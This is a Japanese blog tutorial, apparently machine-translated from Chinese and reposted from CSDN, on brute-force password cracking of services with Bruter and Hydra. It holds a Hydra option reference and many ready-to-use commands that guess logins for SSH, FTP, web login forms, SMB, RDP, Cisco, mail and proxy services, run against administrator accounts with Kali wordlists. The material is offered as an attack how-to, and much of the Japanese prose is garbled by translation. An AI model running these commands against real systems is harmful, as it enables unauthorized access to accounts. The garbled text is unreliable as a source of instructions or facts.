ブルートフォースクラッキングと検証コードのセキュリティ-CSフレームのブルートフォース推測

CS暴力的な推測

ソフトウェア、データベース、オペレーティングシステム、3389関連の亀裂を指します。C / Sはクライアント/サーバーです。sshftp
sql-server mysql などのC / Sアーキテクチャに基づくアプリケーションです。これらのサービスは多くの場合、高特権ユーザーを提供し、この高特権ユーザーはコマンド操作を実行できます。 sql-serverのsa、mysqlのルート、sys、およびoracleのシステムアカウントなど、これらの高特権ユーザーの使用は、開発者に大きな利便性をもたらす可能性がありますが、パスワードが解読されると、発生する被害も非常に大きくなります。 。C / Sアーキテクチャは主にクラックツールを使用しましたHydra、Bruter、X-scan

ウィンドウの下にブリュターを使用することをお勧めします

アドレスを追加し、プロトコルを選択します(ターゲットLinuxの場合はSSH2、Windowsの場合はSMB、データベースの場合はMYSQL、メールボックスの場合はPOP3)、ポート(ヒント:Linuxのデフォルト22、わからない場合はnmapを使用してスキャンします) SSH2

Linuxのデフォルトのユーザー名は、通常のウィンドウのルートである管理者がされ
た辞書を選択(注中国のディレクトリをサポートしていません)
スタートは
また、ネイティブの機能を使用することができます
セットパスワードの長さにします

Linuxではhydraを使用することをお勧めします

Kaliが付属し
ています。自分でダウンロードしてインストールすることもできます
。hydra-gtkはグラフィカルインターフェースです
。hydraは、有名なハッカーグループthcが提供するオープンソースのブルートフォースパスワード解読ツールで、複数のパスワードをオンラインで解読できます。公式サイト:http://www.thc.org/thc-hydra

Kailパスワード辞書

/usr/share/wfuzz/wordlist/others/names.txt
/usr/share/wfuzz/wordlist/others/common_pass.txt
このインターフェースのユーザー名とパスワードリストファイルを指定します。ここでは、Kaliシステムに存在するユーザー名と
パスワードリストファイルを使用しますまた、[ユーザーをループする]オプションを選択します。このうち、ユーザー名とパスワードのファイル
は/usr/share/wfuzz/wordlist/others/names.txtと
/usr/share/wfuzz/wordlist/others/common_pass.txtに保存されています

パラメータ

		hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
		-R 继续从上一次进度接着破解。
		-S 采用 SSL 链接。
		-s PORT 可通过这个参数指定非默认端口。
		-l LOGIN 指定破解的用户名,对特定用户破解。
		-L FILE 指定用户名字典。
		-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
		-P FILE 大写,指定密码字典。
		-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
			一般都是加上的
		-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P 参数。
		-M FILE 指定目标列表文件一行一条。
		-o FILE 指定结果输出文件。
		-f 在使用-M 参数以后,找到第一对登录名或者密码的时候中止破解。
		-t TASKS 同时运行的线程数,默认为 16。 -w TIME 设置最大超时的时间,单位秒,默认是 30s。 -v / -V 显示详细过程。
		server 目标 ip
		service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
			http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 l
		dap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp 
		rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd fi
		rebird ncp afp 等等。
		OPT 可选项

使用例

		1.手动创建用户名字典和密码字典,需要利用密码字典生成器生成强大的字典
		2.破解 ssh:

#hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 sshが
正常にクラックされ、結果が直接表示されます。-oオプションを使用して、結果出力ファイルを指定することもできます。

#hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

		1.破解 ssh:
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
				# hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
		2.破解 ftp:
			# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认 16) -vV
				# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
		3.get 方式提交,破解 web 登录:
			# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
				# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
		4.post 方式提交,破解 web 登录:
			# hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username =^USER^&password=^PASS^&submit=login:sorry password"
				# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "log in.php:id=^USER^&passwd=^PASS^:wrong username or password"
					(参数说明:-t 同时线程数 3,-l 用户名是 admin,字典 pass.txt,保存为 out.txt,-f 当破解了一个密码就停止, 10.36.16.18 目标 ip,http-post-form 表示破解是采用 http 的 post 方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)
		5.破解 https:
			# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
		6.破解 teamspeak:
			# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
		7.破解 cisco:
			# hydra -P pass.txt 10.36.16.18 cisco
				# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
		8.破解 smb:
			# hydra -l administrator -P pass.txt 10.36.16.18 smb
		9.破解 pop3:
			# hydra -l muts -P pass.txt my.pop3.mail pop3
		10.破解 rdp:
			# hydra ip rdp -l administrator -P pass.txt -V
		11.破解 http-proxy:
			# hydra -l admin -P pass.txt http-proxy://10.36.16.18
		12.破解 imap:
			# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

hydra-gtkの使用について

		图形化界面界面比较简单,直接填写IP,设置字典,设置协议等
			就可以开始了

補足

ブラストソフトウェアの選択は、主に速度、安定性、サポートされるプロトコルの数に依存します。
このブルートフォースパスワードクラッキングツールは非常に強力で、ほとんどすべてのプロトコルのオンラインパスワードクラッキングをサポートします。パスワードをクラック
できるかどうかは、辞書が十分に強力かどうかによって異なります。

117件の元の記事を公開 賞賛11件 訪問数6455

おすすめ

転載: blog.csdn.net/weixin_43079958/article/details/105522847